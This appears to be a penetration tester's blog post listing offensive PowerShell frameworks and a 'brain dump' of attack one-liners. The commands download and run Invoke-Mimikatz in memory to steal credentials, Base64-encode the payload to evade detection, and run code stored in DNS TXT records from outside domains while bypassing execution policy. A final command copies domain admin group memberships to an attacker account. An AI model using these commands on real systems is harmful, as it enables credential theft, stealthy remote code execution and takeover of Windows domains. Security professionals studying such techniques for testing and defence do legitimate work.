PowerShell Scratch Pad

Introduction

I’m never quite sure how to start these off, but I figure we start with a personal and possibly sacrilegious anecdote. There was a time when I hated PowerShell.

You can go ahead and crucify me now; however, I just had a really hard time finding value in it. I think that this changed when I saw how truly powerful PowerShell was while providing little additional value to security. There are so many awesome people doing amazing and mysterious things with PowerShell. I’m hoping I can compile my “Greatest Hits” collection here.

Tools and Such

  • PowerSploit - A great collection of offensive PowerShell scripts.
  • Empire - Think Metasploit, but in PowerShell. This framework has integrated itself into my pentesting toolkit and I don’t think I will ever drop it.
  • NPS aka. Not PowerShell - This is an executable that functions… well… like PowerShell.
  • nishang - Another collection of offensive PowerShell scripts.
  • Metasploit even has PowerShell payloads.

Experts in the Field

I’m standing on the shoulders of giants here and I really think people should be focusing on these folks:

Brain Dump

We might want to import functions directly into memory. Invoke-Mimkatz, for example.

1
PS C:\> iex(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1");Invoke-Mimikatz

I think a lot of folks like running encoded PowerShell commands. Here’s how I generate the Base64 encoded commands:

1
$ echo "iex(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1");Invoke-Mimikatz" | iconv --to-code UTF16-LE | base64 -w0

Vincent Yiu shared a really interesting alternative to IEX.

Imagine a world where you can execute commands stored in DNS TXT records…

No need for IEX cc @MDSecLabs : powershell -ep bypass -nop -c “powershell . ((nslookup.exe -q=txt http://calc.vincentyiu.co.uk ))[5]”

I wanted to store Base64 encoded commands in a DNS TXT record, but there’s a unfortunately a character limit of 255 chracters.
So, I split them up across multiple and here’s my first attempt…

1
C:\> powershell -ep bypass -nop -c "$t = (nslookup -q=txt m1.dru1d.ninja)[5]; $t += (nslookup -q=txt m2.dru1d.ninja)[5]; $t += (nslookup -q=txt m3.dru1d.ninja)[5]; powershell -e $t"

Clone the group memberships from an existing administrative account to a new (or existing) account.

1
PS C:\> Get-ADUser -Identity <targeted domain admin> -Properties memberof | Select-Object -ExpandProperty memberof | Add-ADGroupMember -Members <attacker-admin>

Closing

I am totally aware that this is an incomplete list with nothing too special on it. Do not despair - I will add things as I learn them.